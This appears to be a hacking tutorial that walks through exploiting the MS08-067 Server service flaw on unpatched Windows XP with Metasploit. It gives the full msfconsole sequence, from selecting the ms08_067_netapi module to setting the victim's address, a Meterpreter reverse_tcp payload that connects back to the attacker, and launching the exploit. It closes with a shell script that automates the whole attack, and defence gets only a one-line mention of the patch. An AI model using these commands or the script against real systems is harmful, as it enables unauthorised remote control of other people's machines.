In this tutorial we are going to discuss a very famous exploit against unpatched Windows XP machines and other Windows versions of that era: the MS08_067_netapi exploit.
Queries to be solved in this post:
How to gain access to an unpatched Windows XP machine?
How to launch this exploit using the Metasploit Framework?
What does it exactly do?
How to secure yourself?
About the exploit:
The exploit's full name is Microsoft Server Service Relative Path Stack Corruption. A remote user can send a specially crafted RPC request to the Server service that triggers a stack buffer overflow during path canonicalization, and can then execute arbitrary code on the target system.
CVE ID: CVE-2008-4250
1) Get the latest version of the Metasploit Framework, either on Windows XP or on BackTrack.
2) Open Metasploit (the msfconsole).
3) Type show exploits. This command prints the names and a short description of all the exploits in your Metasploit installation.
4) Then search for the exploit named ms08_067_netapi. The exact name differs between Metasploit versions, so you can also use the search command: type search smb. This prints all SMB-related modules; look for the one we want (search ms08_067 narrows the list further).
5) Then type use windows/smb/ms08_067_netapi in the console. [The syntax is use <path of the exploit>; here windows/smb/ms08_067_netapi is the path of our exploit, which msfconsole also accepts in its full form exploit/windows/smb/ms08_067_netapi.]
6) You can then type show options; this prints all the options available for that exploit, and the ones marked Required must be given a value before it will run.
7) Now you need to configure the exploit to attack the target machine.
7.1) Type set rhost victimipaddress. [RHOST is the IP address of the victim (newer Metasploit versions call this option RHOSTS), for example set rhost 192.168.1.22. Here 192.168.1.22 is the address of the victim's machine.]
7.2) Type set payload windows/meterpreter/reverse_tcp.
This command binds the reverse_tcp payload to our exploit. So what is a payload actually?
Let me clear your query! Payload: the payload is the shellcode/assembly code/commands to be executed on the target machine once our exploit has gained control of it.
Suppose your exploit is successfully executed on the target machine; your payload then tells it what to do after that.
The reverse_tcp payload opens a connection back from the victim to your machine and gives you a Meterpreter session, after which you can do whatever you want.
You can also choose a different payload by typing show payloads; this prints all the payloads compatible with the exploit. Pick one and select it with set payload payloadpath.
7.3) Type set lhost yourownipaddress. This sets the local host address, the address the payload connects back to. Set your own IP address here, the one reachable from the victim. The listening port defaults to 4444 and can be changed with set lport.
8) Now the last step: type exploit. The exploit executes and, if the machine is not patched, you get a remote shell connection to the target machine and can do whatever you want from there. If the target has the MS08-067 security update installed the exploit fails, so installing that update is the fix.
Note: You get a remote connection in this case because the selected payload is reverse_tcp. The result varies according to the payload selected.
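The whole procedure above, as an added example that is not part of the original post: a POSIX shell script for the BackTrack/Linux side that writes the msfconsole commands from steps 5 to 8 into a Metasploit resource file and runs it with msfconsole -r. It assumes msfconsole is on PATH, uses the post's placeholder addresses, and writes the option name used by current Metasploit versions (RHOSTS); on the Metasploit 3.x builds that shipped with BackTrack the option was RHOST, so change that line if you are on one of those. The check command before exploit is the module's built-in vulnerability test, which reports whether the host is patched without sending the payload.

```shell
#!/bin/sh
# Added example: wraps steps 5-8 of the walkthrough into a Metasploit
# resource script and launches it non-interactively. Assumes msfconsole
# is on PATH and that you are authorised to test the target. Not part of
# the original post; addresses are placeholders.

# Return 0 if $1 looks like a dotted-quad IPv4 address, 1 otherwise.
is_ipv4() {
    printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$'
}

# Write a resource script for ms08_067_netapi to the file named in $3.
# $1 = victim address (RHOSTS), $2 = our address (LHOST), $4 = LPORT
# (optional, defaults to Metasploit's own default of 4444).
# Returns 1 on a malformed address so a typo cannot aim the exploit at
# the wrong host.
write_rc() {
    rhost=$1; lhost=$2; out=$3; lport=${4:-4444}
    is_ipv4 "$rhost" || { echo "bad RHOSTS: $rhost" >&2; return 1; }
    is_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
    cat > "$out" <<EOF
# steps 5-7 of the walkthrough, in order
use exploit/windows/smb/ms08_067_netapi
set RHOSTS $rhost
set payload windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
# the module's own vulnerability check: probes the path-canonicalisation
# bug without running the payload, so a patched host is reported
# rather than attacked
check
# step 8: fire the exploit; -j backgrounds the job so the console stays usable
exploit -j
EOF
}

# Generate the script and hand it to msfconsole
# (-q: no banner, -r: run a resource file).
run_ms08_067() {
    rc=$(mktemp) || return 1
    write_rc "$1" "$2" "$rc" "$3" || return 1
    msfconsole -q -r "$rc"
}

# Usage: ./ms08_067.sh <victim ip> <our ip> [lport]
if [ $# -ge 2 ]; then
    run_ms08_067 "$@"
fi
```

Run it as ./ms08_067.sh 192.168.1.22 192.168.1.10. Once a session is reported, sessions -i 1 attaches to it, exactly as if you had typed the steps by hand.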